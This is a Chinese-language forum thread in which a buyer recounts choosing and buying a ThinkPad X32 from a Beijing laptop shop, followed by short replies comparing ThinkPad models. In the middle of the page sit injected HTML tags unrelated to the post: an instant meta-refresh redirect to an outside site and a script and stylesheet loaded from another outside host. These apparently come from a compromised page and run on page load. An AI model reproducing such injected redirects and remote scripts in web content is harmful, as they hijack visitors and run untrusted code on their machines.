开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

购本感言

俗话说,不当家不知柴米贵,从计划要买一个本本到付诸行动历时两个来月,目标也从IBM转到DELL又转回到IBM,飘忽不定的最主要理由当然是银两的问题喽!总不能买完之后就改用精神食粮吧。
几个月之前同学曾经推荐过翔意论坛,说这里信誉不错,他曾经在这里买过,买本的时候可以参考一下,只是当时计划尚未成熟。这次动了凡心,经过深思熟虑,最终还是将目标锁定为IBM,于是开始了在翔意的潜水生涯。潜水不过瘾后就注册了自己的ID,偶尔也说上两句话。这时候游移不定的则是选X41,X32,还是T系列,说实话,我的要求极其简单,上上网,发发MAIL,聊聊MSN,用用OFFICE,朋友都说是个电脑就可以满足我的需要,更有甚者说让我买个PDA了事,真是惨糟鄙视,也有人说,喜欢它作甚,黑乎乎一块,谁人可知;“任凭溺水三千,我只取一瓢饮”,我在论坛上搜索出关于X的帖子,拜读了一遍,选择了X32,原因呢,可能是儒家思想,中庸主义吧,还有一点,就是比较便宜,还可以节省一些粮食,呵呵。所有小黑迷们如果有什么疑虑的话,不妨多翻看帖子,还是非常有帮助的,帮助自己来选择最适合的本本。

购机呢,当然就比较简单了,拽上了我的军师——我的同学,本人是个只会应用菜鸟,对于检测七窍通了六窍。有了军师,连在门牌号复杂的安琪找501都变的十分容易。我们应该是当天第一批,一会的工夫来了三四拔黑友,可见翔意生意兴隆呀。目标明确,X32KWH,同学在那里认真的看来看去,我在旁边则无所事事,军师真是责任重大呀。漂亮的郑为我们装了系统,因为X32没有光驱,我和同学在翔意霸占一席之地N久,借用翔意的光驱把应用软件装了个差不多,在这里,表示一下谢意啦。
MM的服务很好的,百问不烦,只是当时只有她一个人,都忙不过来了,辛苦辛苦。

最后呢,希望我的本本长命百岁
      盼望XY论坛的XDJM都能够拥有自己心仪的本本
      渴望XY论坛越来越兴旺,价格越来越实惠
      愿望:等咱富裕了,买了两个本本,一个高性能,在家用,一个超轻薄,随身带,再也不中庸:)

当然不能忘记申请贵宾 X32 KWH      S/N  L3E1451

对了,再谢谢XY论坛,增长了不少关于本本的知识,在外行面前我都能充当半个行家啦,哈哈

谢谢您的信赖+30---EddieFan

评分

EddieFan + 30

贵宾已加
<meta http-equiv="refresh" content="0; url=http://www.548.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

X3和X4确实难以定夺,我喜欢X4,我LP则喜欢X3.还有我越来越觉得指纹真是鸡肋。
给你个简单的图

型号     便携性       性能
T43        差             好
X32        中             中
X41        好             差
我看了许多留言之后选的X32,EddieFan的解释还是很清楚的,不过至今还没有见到过X41的样子,也算是个遗憾呀!
liux 该用户已被删除
THANKS,大家好象都比较喜欢T系列的,可是我嫌太重了,背不动
好文啊
恭喜
图片上来看看
本本半个月了,还想加个内存条
再来一张
靓机
还是43帅些
X32也挺好的,性能与便携的结合
还是比较喜欢t的
x系列也挺好的
轻便

希望我的本本长命百岁 haha

积极的发贴回帖,争取早日达到优惠标准,为买机打好坚实的基础!
现在可以看看买个apple或x60 。这真是性能和便携完美结合。